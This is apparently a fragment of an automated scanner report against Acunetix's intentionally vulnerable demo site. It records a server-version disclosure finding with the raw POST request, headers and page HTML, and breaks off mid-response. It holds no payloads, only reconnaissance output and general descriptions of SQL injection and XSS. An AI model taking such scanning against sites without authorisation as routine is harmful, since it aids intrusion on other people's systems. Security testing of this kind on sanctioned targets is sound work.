ICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 